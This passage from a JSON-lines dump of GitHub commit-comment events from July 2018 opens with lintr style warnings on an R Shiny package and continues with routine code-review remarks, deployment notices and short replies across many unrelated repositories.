^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/rastersOverTime.R:187:6:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/rastersOverTime.R#L187) *style:* **Commented code should be removed.**\n```r\n​    #sp1 <- SpatialPoints(t(bbox(mapBoundsAsExtent)), proj4string = CRS(proj4stringLFLT))\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/rastersOverTime.R:188:6:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/rastersOverTime.R#L188) *style:* **Commented code should be removed.**\n```r\n​    #sp2 <- spTransform(sp1, crs(rast))\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/rastersOverTime.R:189:6:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/rastersOverTime.R#L189) *style:* **Commented code should be removed.**\n```r\n​    #tryCatch(crop(rast, sp2), error = function(x) NULL) ## TODO: why error? why NULL?\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/rastersOverTime.R:199:7:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/rastersOverTime.R#L199) *style:* **Commented code should be removed.**\n```r\n​    # Cache(.sampleRasterToRAM, ras)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/simOutputs.R:90:6:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/simOutputs.R#L90) *style:* **Commented code should be removed.**\n```r\n​    #Plot(demoArea, addTo = \"map\") ## TO DO: use study area from inside simList\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/slicer.R:24:9:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/slicer.R#L24) *style:* **Commented code should be removed.**\n```r\n​      # setkeyv(datatable, chosenCategories[[len]])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/slicer.R:26:11:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/slicer.R#L26) *style:* **Commented code should be removed.**\n```r\n​      #   subtable <- na.omit(datatable[chosenValues[[len]]])\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/slicer.R:135:6:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/slicer.R#L135) *style:* **Commented code should be removed.**\n```r\n​    #assertthat::assert_that(is.data.table(datatable()))\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/slicer.R:163:7:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/slicer.R#L163) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​      } %>% unique()\n      ^\n```\n[R/slicer.R:169:9:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/slicer.R#L169) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​        } %>% unique()\n        ^\n```\n[R/slicer.R:175:11:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/slicer.R#L175) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​          } %>% unique()\n          ^\n```\n[R/spades.R:19:1:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/spades.R#L19) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​spades_simInit <- function(input, output, session, ...) {\n^~~~~~~~~~~~~~\n```\n[R/spades.R:52:1:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/spades.R#L52) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​spades_expt <- function(input, output, session, sim, reps, seed, objectsToHash,\n^~~~~~~~~~~\n```\n[R/spades.R:57:6:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/spades.R#L57) *style:* **Commented code should be removed.**\n```r\n​    #initialRun1 <- spades(Copy(sim), debug = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/uploadPolygon.R:58:1:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/uploadPolygon.R#L58) *style:* **Lines should not be more than 100 characters.**\n```r\n​        p(\"Upload a shapefile by selecting .shp and its associated files (or upload a single .zip file).\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/uploadPolygon.R:59:1:](https://github.com/PredictiveEcology/SpaDES.shiny/blob/855974f7dad926f80e934781db6800bb1b6fd20f/R/uploadPolygon.R#L59) *style:* **Lines should not be more than 100 characters.**\n```r\n​        p(\"Each polygon should have a \\\"shinyLabel\\\" attribute, otherwise a generic default will be used.\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-31T20:15:50Z"}
{"id":"8046428672","type":"CommitCommentEvent","actor":{"login":"wilsonpe66"},"repo":{"name":"wilsonpe66/ogl"},"payload":{"comment":{"id":29910904,"position":181,"line":514,"path":"CMakeLists.txt","commit_id":"282d96557bfceb2f5ab23fad5b46a6aceb0755da","created_at":"2018-07-31T20:16:30Z","updated_at":"2018-07-31T20:16:30Z","author_association":"OWNER","body":"Fix Spacing"}},"created_at":"2018-07-31T20:16:30Z"}
{"id":"8046428917","type":"CommitCommentEvent","actor":{"login":"kerizane"},"repo":{"name":"Tuxemon/Tuxemon"},"payload":{"comment":{"id":29910905,"position":null,"line":null,"path":null,"commit_id":"d84dc85f6372d4a3653e97543e68fa5cee1a9afb","created_at":"2018-07-31T20:16:33Z","updated_at":"2018-07-31T20:16:33Z","author_association":"CONTRIBUTOR","body":"I'm guessing it's a dependency? I'm up to date on the failing computer, maybe not on the working one.\r\n\r\nBackground state, seems to be making startstate lose \"menu_items\" around here. \r\n\r\ntuxemon/core/control.py, line 642:\r\n        for state in self.active_states:\r\n            state.update(dt)\r\n\r\n        for state in self._state_resume_set:\r\n            state.resume()\r\n            state.update(dt)\r\n\r\nIt works if we don't push the background state, which obviously isn't a fix."}},"created_at":"2018-07-31T20:16:33Z"}
{"id":"8046431029","type":"CommitCommentEvent","actor":{"login":"epunx2"},"repo":{"name":"epunx2/coffee-cli-app"},"payload":{"comment":{"id":29910909,"position":null,"line":null,"path":null,"commit_id":"443c8fcb770cea05294efced6e3fc9c1f280c8ce","created_at":"2018-07-31T20:16:58Z","updated_at":"2018-07-31T20:16:58Z","author_association":"OWNER","body":"This commit wasn't approved."}},"created_at":"2018-07-31T20:16:58Z"}
{"id":"8046431049","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29910910,"position":7,"line":5,"path":"listen2/populate_hash_of_vowels.rb","commit_id":"0c43be28a43373025dbf6154fd0b2c521321a6e7","created_at":"2018-07-31T20:16:58Z","updated_at":"2018-07-31T20:16:58Z","author_association":"NONE","body":"Ну, тут можно было использовать Range c конвертанцией его в массив. `('а'..'я').to_a`"}},"created_at":"2018-07-31T20:16:58Z"}
{"id":"8046432295","type":"CommitCommentEvent","actor":{"login":"avil13"},"repo":{"name":"avil13/vue-sweetalert2"},"payload":{"comment":{"id":29910913,"position":13,"line":12,"path":"src/index.js","commit_id":"23c09927110939ce3a6d17cbcfc0e8115707a32d","created_at":"2018-07-31T20:17:13Z","updated_at":"2018-07-31T20:17:13Z","author_association":"OWNER","body":"Thank you for this feedback.\r\nI need to think about it.\r\nI will add a simple Promise, and I will have to think about your proposal.\r\n\r\nIn any case, if you test it in a unit test, then it now seems strange to me.\r\nHere, UI tests take place.\r\n\r\nThe developers of sweetalert2 also had ideas for working with SSR. Let's see what they do.\r\n\r\nIn any case, I'm very happy with your comment."}},"created_at":"2018-07-31T20:17:13Z"}
{"id":"8046432589","type":"CommitCommentEvent","actor":{"login":"wilsonpe66"},"repo":{"name":"wilsonpe66/ogl"},"payload":{"comment":{"id":29910916,"position":5,"line":4,"path":"common/controls.cpp","commit_id":"282d96557bfceb2f5ab23fad5b46a6aceb0755da","created_at":"2018-07-31T20:17:16Z","updated_at":"2018-07-31T20:17:16Z","author_association":"OWNER","body":"Fix Spacing"}},"created_at":"2018-07-31T20:17:16Z"}
{"id":"8046471529","type":"CommitCommentEvent","actor":{"login":"thinkseven"},"repo":{"name":"thinkseven/reactnd-redux-todos-goals"},"payload":{"comment":{"id":29911024,"position":null,"line":null,"path":null,"commit_id":"6063b13654c56bdc6e49da6779b905f6f99d72ac","created_at":"2018-07-31T20:24:45Z","updated_at":"2018-07-31T20:24:45Z","author_association":"OWNER","body":"Summary\r\nIf a web application requires interaction with a server, applying middleware such as thunk helps solve the issue of asynchronous data flow. Thunk middleware allows us to write action creators that return functions rather than objects.\r\n\r\nBy calling our API in an action creator, we make the action creator responsible for fetching the data it needs to create the action. Since we move the data-fetching code to action creators, we build a cleaner separation between our UI logic and our data-fetching logic. As a result, thunks can then be used to delay an action dispatch, or to dispatch only if a certain condition is met (e.g., a request is resolved)."}},"created_at":"2018-07-31T20:24:45Z"}
{"id":"8046471902","type":"CommitCommentEvent","actor":{"login":"wilsonpe66"},"repo":{"name":"wilsonpe66/ogl"},"payload":{"comment":{"id":29911026,"position":276,"line":124,"path":"common/vboindexer.cpp","commit_id":"282d96557bfceb2f5ab23fad5b46a6aceb0755da","created_at":"2018-07-31T20:24:50Z","updated_at":"2018-07-31T20:24:50Z","author_association":"OWNER","body":"const in params"}},"created_at":"2018-07-31T20:24:50Z"}
{"id":"8046473514","type":"CommitCommentEvent","actor":{"login":"wilsonpe66"},"repo":{"name":"wilsonpe66/ogl"},"payload":{"comment":{"id":29911033,"position":202,"line":91,"path":"common/vboindexer.cpp","commit_id":"282d96557bfceb2f5ab23fad5b46a6aceb0755da","created_at":"2018-07-31T20:25:08Z","updated_at":"2018-07-31T20:25:08Z","author_association":"OWNER","body":"const in params"}},"created_at":"2018-07-31T20:25:08Z"}
{"id":"8046473648","type":"CommitCommentEvent","actor":{"login":"tklengyel"},"repo":{"name":"scorpionzezz/libvmi"},"payload":{"comment":{"id":29911034,"position":6,"line":772,"path":"libvmi/driver/xen/xen_events_48.c","commit_id":"9867290066d7333d68f9a96f15076b707bb9d108","created_at":"2018-07-31T20:25:09Z","updated_at":"2018-07-31T20:25:09Z","author_association":"NONE","body":"No need to set it to -1, it will just get overwritten anyway."}},"created_at":"2018-07-31T20:25:09Z"}
{"id":"8046475319","type":"CommitCommentEvent","actor":{"login":"wilsonpe66"},"repo":{"name":"wilsonpe66/ogl"},"payload":{"comment":{"id":29911038,"position":17,"line":6,"path":"common/vboindexer.hpp","commit_id":"282d96557bfceb2f5ab23fad5b46a6aceb0755da","created_at":"2018-07-31T20:25:28Z","updated_at":"2018-07-31T20:25:28Z","author_association":"OWNER","body":"const in params"}},"created_at":"2018-07-31T20:25:28Z"}
{"id":"8046475794","type":"CommitCommentEvent","actor":{"login":"PotionSell"},"repo":{"name":"PotionSell/SFACT-proc"},"payload":{"comment":{"id":29911039,"position":null,"line":null,"path":null,"commit_id":"8b60fb598777835872aa7b83050dc404faf9ea72","created_at":"2018-07-31T20:25:34Z","updated_at":"2018-07-31T20:25:34Z","author_association":"OWNER","body":"Commit message for walf.py: \"scopy now overwrites previous 1Dspectra, for consistency issues. Final options determining an object's fate are more explicit. The header for lineData now consistently writes to file\""}},"created_at":"2018-07-31T20:25:34Z"}
{"id":"8046476606","type":"CommitCommentEvent","actor":{"login":"wilsonpe66"},"repo":{"name":"wilsonpe66/ogl"},"payload":{"comment":{"id":29911042,"position":32,"line":16,"path":"common/vboindexer.hpp","commit_id":"282d96557bfceb2f5ab23fad5b46a6aceb0755da","created_at":"2018-07-31T20:25:44Z","updated_at":"2018-07-31T20:25:44Z","author_association":"OWNER","body":"const in params"}},"created_at":"2018-07-31T20:25:44Z"}
{"id":"8046481930","type":"CommitCommentEvent","actor":{"login":"ferm10n"},"repo":{"name":"avil13/vue-sweetalert2"},"payload":{"comment":{"id":29911054,"position":13,"line":12,"path":"src/index.js","commit_id":"23c09927110939ce3a6d17cbcfc0e8115707a32d","created_at":"2018-07-31T20:26:44Z","updated_at":"2018-07-31T20:26:44Z","author_association":"NONE","body":"Glad to help! Yeah I only see it being an issue if you are doing automated UI testing."}},"created_at":"2018-07-31T20:26:44Z"}
{"id":"8046484820","type":"CommitCommentEvent","actor":{"login":"manuelvarzen"},"repo":{"name":"manuelvarzen/Vigia"},"payload":{"comment":{"id":29911061,"position":null,"line":null,"path":null,"commit_id":"413b609a1fd08c50cd9171e70c2c247eb1865f87","created_at":"2018-07-31T20:27:15Z","updated_at":"2018-07-31T20:27:15Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-31T20:27:15Z"}
{"id":"8046485004","type":"CommitCommentEvent","actor":{"login":"nqpz"},"repo":{"name":"athas/EggsML"},"payload":{"comment":{"id":29911064,"position":null,"line":null,"path":null,"commit_id":"b9898a901983611780ab1ca1d7b726d9baca5251","created_at":"2018-07-31T20:27:17Z","updated_at":"2018-07-31T20:27:17Z","author_association":"COLLABORATOR","body":"Jeg kan ikke lide bogstavet 'x'."}},"created_at":"2018-07-31T20:27:17Z"}
{"id":"8046486404","type":"CommitCommentEvent","actor":{"login":"tklengyel"},"repo":{"name":"scorpionzezz/libvmi"},"payload":{"comment":{"id":29911070,"position":6,"line":772,"path":"libvmi/driver/xen/xen_events_48.c","commit_id":"9867290066d7333d68f9a96f15076b707bb9d108","created_at":"2018-07-31T20:27:33Z","updated_at":"2018-07-31T20:27:33Z","author_association":"NONE","body":"In fact, there is no need for this variable at all, just check the function's return in the if directly."}},"created_at":"2018-07-31T20:27:33Z"}
{"id":"8046488421","type":"CommitCommentEvent","actor":{"login":"veggiesaurus"},"repo":{"name":"idia-astro/carta-frontend"},"payload":{"comment":{"id":29911073,"position":30,"line":45,"path":"src/components/Dialogs/OverlaySettings/OverlaySettingsDialogComponent.tsx","commit_id":"cf994d7794168d191f53815f668c74793f4fd732","created_at":"2018-07-31T20:27:57Z","updated_at":"2018-07-31T20:27:57Z","author_association":"COLLABORATOR","body":"We should probably use [FormGroups](http://blueprintjs.com/docs/#core/components/form-group) instead of [Labels](http://blueprintjs.com/docs/#core/components/label). In general (although I don't think the example I gave you followed this), we should prefer the React component usage (`<Label inline={true}>`) to the standard HTML + CSS approach (`<label className=\"bp3-label\">`)\r\nExample usage: \r\n`<FormGroup inline={true} label=\"Hello\">...</FormGroup> `\r\n"}},"created_at":"2018-07-31T20:27:57Z"}
{"id":"8046490016","type":"CommitCommentEvent","actor":{"login":"leerho"},"repo":{"name":"DataSketches/sketches-core"},"payload":{"comment":{"id":29911080,"position":32,"line":104,"path":"src/main/java/com/yahoo/sketches/theta/ConcurrentHeapThetaBuffer.java","commit_id":"7a316640dbd4e54823804c3caf71950bbc5dabcb","created_at":"2018-07-31T20:28:14Z","updated_at":"2018-07-31T20:28:14Z","author_association":"CONTRIBUTOR","body":"You removed the option to propagate a non-ordered buffer. Why?  It is not at all clear that sorting and compacting the buffer is faster than a linear scan, especially in a real-time application.  Sorting certainly makes sense when the buffer/sketch is computed offline, then the merge with early stop is clearly the fastest.\r\n"}},"created_at":"2018-07-31T20:28:14Z"}
{"id":"8046490025","type":"CommitCommentEvent","actor":{"login":"rikkyrai"},"repo":{"name":"lqchen77/Li-Qing"},"payload":{"comment":{"id":29911081,"position":null,"line":null,"path":null,"commit_id":"886c7e7576e00bd3998c8d4f2a6e6c9f5b2c9e7e","created_at":"2018-07-31T20:28:14Z","updated_at":"2018-07-31T20:28:14Z","author_association":"COLLABORATOR","body":"lets track changes to file"}},"created_at":"2018-07-31T20:28:14Z"}
{"id":"8046491716","type":"CommitCommentEvent","actor":{"login":"wilsonpe66"},"repo":{"name":"wilsonpe66/ogl"},"payload":{"comment":{"id":29911087,"position":28,"line":6,"path":"common/objloader.hpp","commit_id":"282d96557bfceb2f5ab23fad5b46a6aceb0755da","created_at":"2018-07-31T20:28:32Z","updated_at":"2018-07-31T20:28:32Z","author_association":"OWNER","body":"const in params"}},"created_at":"2018-07-31T20:28:32Z"}
{"id":"8046492701","type":"CommitCommentEvent","actor":{"login":"veggiesaurus"},"repo":{"name":"idia-astro/carta-frontend"},"payload":{"comment":{"id":29911088,"position":43,"line":58,"path":"src/components/Dialogs/OverlaySettings/OverlaySettingsDialogComponent.tsx","commit_id":"cf994d7794168d191f53815f668c74793f4fd732","created_at":"2018-07-31T20:28:43Z","updated_at":"2018-07-31T20:28:43Z","author_association":"COLLABORATOR","body":"Typo (probably from following my example, sorry): `.bp3-inline` should be `bp3-inline`, but see above"}},"created_at":"2018-07-31T20:28:43Z"}
{"id":"8046497536","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29911114,"position":null,"line":null,"path":null,"commit_id":"a1a873d787f5487f2c260cb16715ec31a89b28e1","created_at":"2018-07-31T20:29:38Z","updated_at":"2018-07-31T20:29:38Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-595](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-595).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-595-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T20:29:38Z"}
{"id":"8046499034","type":"CommitCommentEvent","actor":{"login":"wilsonpe66"},"repo":{"name":"wilsonpe66/ogl"},"payload":{"comment":{"id":29911116,"position":49,"line":16,"path":"common/vboindexer.cpp","commit_id":"282d96557bfceb2f5ab23fad5b46a6aceb0755da","created_at":"2018-07-31T20:29:56Z","updated_at":"2018-07-31T20:29:56Z","author_association":"OWNER","body":"const in params"}},"created_at":"2018-07-31T20:29:56Z"}
{"id":"8046499800","type":"CommitCommentEvent","actor":{"login":"lqchen77"},"repo":{"name":"lqchen77/Li-Qing"},"payload":{"comment":{"id":29911121,"position":null,"line":null,"path":null,"commit_id":"886c7e7576e00bd3998c8d4f2a6e6c9f5b2c9e7e","created_at":"2018-07-31T20:30:06Z","updated_at":"2018-07-31T20:30:06Z","author_association":"OWNER","body":"alright"}},"created_at":"2018-07-31T20:30:06Z"}
{"id":"8046500443","type":"CommitCommentEvent","actor":{"login":"wilsonpe66"},"repo":{"name":"wilsonpe66/ogl"},"payload":{"comment":{"id":29911124,"position":99,"line":40,"path":"common/vboindexer.cpp","commit_id":"282d96557bfceb2f5ab23fad5b46a6aceb0755da","created_at":"2018-07-31T20:30:13Z","updated_at":"2018-07-31T20:30:13Z","author_association":"OWNER","body":"const in params"}},"created_at":"2018-07-31T20:30:13Z"}
{"id":"8046505299","type":"CommitCommentEvent","actor":{"login":"LuccaPessoa"},"repo":{"name":"LuccaPessoa/uri-problem-solutions"},"payload":{"comment":{"id":29911138,"position":null,"line":null,"path":null,"commit_id":"d011c6343ec92dd32c9d55d015b02d3d74dfb043","created_at":"2018-07-31T20:31:07Z","updated_at":"2018-07-31T20:31:07Z","author_association":"OWNER","body":"1002 - Área do Círculo"}},"created_at":"2018-07-31T20:31:07Z"}
{"id":"8046510516","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/blackjack"},"payload":{"comment":{"id":29911149,"position":null,"line":null,"path":null,"commit_id":"8ae753d84d098aa0a860f8ed92449540a8b875bd","created_at":"2018-07-31T20:32:10Z","updated_at":"2018-07-31T20:32:10Z","author_association":"NONE","body":"из этих пунктов  у тебя реализованы верно пункт 1 и пункт 4, хотя я бы добавил класс Карта, это будет более верно, чем возиться с коллекцией \r\nпо пунктам 2 и 3 надо править ситуацию\r\nв принципе можешь оставить класс + модуль, хотя мне больше нравится вариант 2 класса\r\nглавное, чтобы в одном классе была вся логика, в другом все инпуты/аутпуты\r\nесли делать через классы, то это выглядит как-то так:\r\nв классе Гейм или любой другой объект класса Интерфейс либо передается при инстанциации, либо инициализируется в инишиалайзе... т.е. либо `game = Game.new(interface)`, либо\r\n```ruby\r\nclass Game\r\n  def inititalize\r\n    @interface = Interface.new\r\n    ....\r\n```\r\n\r\nну и далее в этом классе нет ни одного \"путса\" и ни одного \"гетса\"\r\nа только код вида `@interface.show_train(train)` или `train_index = @interface.ask_for_train_index`\r\nможно похожий функционал реализовать и через модуль\r\n\r\nну и в интерфейсе соответсвенно максимум логики - это итерация по коллекции, которую передали в метод, для печати... в таком вот ключе"}},"created_at":"2018-07-31T20:32:10Z"}
{"id":"8046511223","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29911151,"position":null,"line":null,"path":null,"commit_id":"c9c1ec254f4d00b98ee43fdac45b9bdace42c538","created_at":"2018-07-31T20:32:19Z","updated_at":"2018-07-31T20:32:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the project](https://trello.com/c/qgy6pXfw/4-setup-the-project)"}},"created_at":"2018-07-31T20:32:19Z"}
{"id":"8046511230","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29911152,"position":null,"line":null,"path":null,"commit_id":"5552459bbb1c74fd80877d11d34c3c93302152af","created_at":"2018-07-31T20:32:19Z","updated_at":"2018-07-31T20:32:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the project](https://trello.com/c/qgy6pXfw/4-setup-the-project)"}},"created_at":"2018-07-31T20:32:19Z"}
{"id":"8046511839","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29911155,"position":51,"line":33,"path":"test/account-mgmt.test.js","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-31T20:32:26Z","updated_at":"2018-07-31T20:32:26Z","author_association":"OWNER","body":"```const weiAmount = new BigNumber(Web3Utils.toWei(1)).plus(1)```\r\nresults in: \"Error: Please pass numbers as strings or BigNumber objects to avoid precision errors.\"\r\n\r\n```const weiAmount = new BigNumber(Web3Utils.toWei('1')).plus(1)```, and\r\n```const weiAmount = new BigNumber(Web3Utils.toWei('1')).plus(new BigNumber(1))```\r\nboth result in: \"TypeError: number.lessThan is not a function\""}},"created_at":"2018-07-31T20:32:26Z"}
{"id":"8046513764","type":"CommitCommentEvent","actor":{"login":"leerho"},"repo":{"name":"DataSketches/sketches-core"},"payload":{"comment":{"id":29911163,"position":35,"line":105,"path":"src/main/java/com/yahoo/sketches/theta/ConcurrentHeapThetaBuffer.java","commit_id":"7a316640dbd4e54823804c3caf71950bbc5dabcb","created_at":"2018-07-31T20:32:48Z","updated_at":"2018-07-31T20:32:48Z","author_association":"CONTRIBUTOR","body":"It is not clear to me why you don't want a compareAndSet here.  Especially since you end up setting it anyway."}},"created_at":"2018-07-31T20:32:48Z"}
{"id":"8046522398","type":"CommitCommentEvent","actor":{"login":"dgrove-oss"},"repo":{"name":"apache/incubator-openwhisk-deploy-kube"},"payload":{"comment":{"id":29911191,"position":5,"line":58,"path":"helm/openwhisk/templates/invoker.yaml","commit_id":"da768898f0a06e0cbcb19a144c60942fba17429a","created_at":"2018-07-31T20:34:32Z","updated_at":"2018-07-31T20:34:32Z","author_association":"CONTRIBUTOR","body":"yeah, INVOKER_NAME is what we actually wanted here.  still 1/2 on vacation I guess.  I'll do a fixup PR."}},"created_at":"2018-07-31T20:34:32Z"}
{"id":"8046522682","type":"CommitCommentEvent","actor":{"login":"diemol"},"repo":{"name":"SeleniumHQ/docker-selenium"},"payload":{"comment":{"id":29911193,"position":null,"line":null,"path":null,"commit_id":"a5005cdf7c84ee12f54e0b5d56cf1fc894be0412","created_at":"2018-07-31T20:34:35Z","updated_at":"2018-07-31T20:34:35Z","author_association":"MEMBER","body":"Right, if the variable is already quoted I imagine it will fail. It just happens that for the 3.13 release the validation of parameters needs the value to be quoted.\r\nWill fix it and release soon.\r\n"}},"created_at":"2018-07-31T20:34:35Z"}
{"id":"8046525610","type":"CommitCommentEvent","actor":{"login":"HARIDY1"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29911208,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-31T20:35:09Z","updated_at":"2018-07-31T20:35:09Z","author_association":"NONE","body":"This is a great project\r\n\r\n"}},"created_at":"2018-07-31T20:35:09Z"}
{"id":"8046526588","type":"CommitCommentEvent","actor":{"login":"keithsw1111"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29911213,"position":null,"line":null,"path":null,"commit_id":"f977d8d512c95d31bb5b21ccf6b2224af691ed8a","created_at":"2018-07-31T20:35:19Z","updated_at":"2018-07-31T20:35:19Z","author_association":"COLLABORATOR","body":"It doesnt reset the segment sizes ... just the individual start channels. I was playing with it last night and I found it made more sense that it did reset when you unselected it ... in fact it got confusing when i didnt ... particularly if i was adding/removing segments/string with the individual box checked ... the start channel numbers it generates end up weird because the old stuff is still there. But happy to take your guidance."}},"created_at":"2018-07-31T20:35:19Z"}
{"id":"8046529001","type":"CommitCommentEvent","actor":{"login":"Brokkonaut"},"repo":{"name":"LogBlock/LogBlock"},"payload":{"comment":{"id":29911218,"position":null,"line":null,"path":null,"commit_id":"e5097a1577e0050dd50d5cf82557d0ec14e05131","created_at":"2018-07-31T20:35:47Z","updated_at":"2018-07-31T20:35:47Z","author_association":"MEMBER","body":"Should have been \"*of itemstacks\" in the commit message"}},"created_at":"2018-07-31T20:35:47Z"}
{"id":"8046529023","type":"CommitCommentEvent","actor":{"login":"joanliu"},"repo":{"name":"ivolo/disposable-email-domains"},"payload":{"comment":{"id":29911219,"position":null,"line":null,"path":null,"commit_id":"78c82c7d3cba30217300f83e55679b1246d84898","created_at":"2018-07-31T20:35:47Z","updated_at":"2018-07-31T20:35:47Z","author_association":"CONTRIBUTOR","body":"meant drivesotp7.com"}},"created_at":"2018-07-31T20:35:47Z"}
{"id":"8046530051","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29911224,"position":null,"line":null,"path":null,"commit_id":"1d72d6ce114e282bea2ba92410d0a280d8a85c39","created_at":"2018-07-31T20:36:00Z","updated_at":"2018-07-31T20:36:00Z","author_association":"COLLABORATOR","body":"The `associative law` is really great logic foundation. I should really learn how to think a coding problem from a higher level instead of directly going to details. Thanks.\r\n\r\nAnd I just found the bug which happens in the code I wrote. And I have fixed it. 52aeabab336d6a2317d093bd5f16f00d6bf171e0 and 038c099135aac0f23d6efe881e5bc67ada52e24d. If this change is ok, I will start on fixing the stable."}},"created_at":"2018-07-31T20:36:00Z"}
{"id":"8046532305","type":"CommitCommentEvent","actor":{"login":"karolsw3"},"repo":{"name":"Galactim/Sudoku"},"payload":{"comment":{"id":29911227,"position":null,"line":null,"path":null,"commit_id":"1f380193e6c1ccaa3243fd0b0040cab0fef03066","created_at":"2018-07-31T20:36:26Z","updated_at":"2018-07-31T20:36:26Z","author_association":"MEMBER","body":"successful*"}},"created_at":"2018-07-31T20:36:26Z"}
{"id":"8046534303","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29911231,"position":null,"line":null,"path":null,"commit_id":"4331da8808363913904c2c1ad65c04055abe2fce","created_at":"2018-07-31T20:36:49Z","updated_at":"2018-07-31T20:36:49Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-597](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-597).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-597-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T20:36:49Z"}
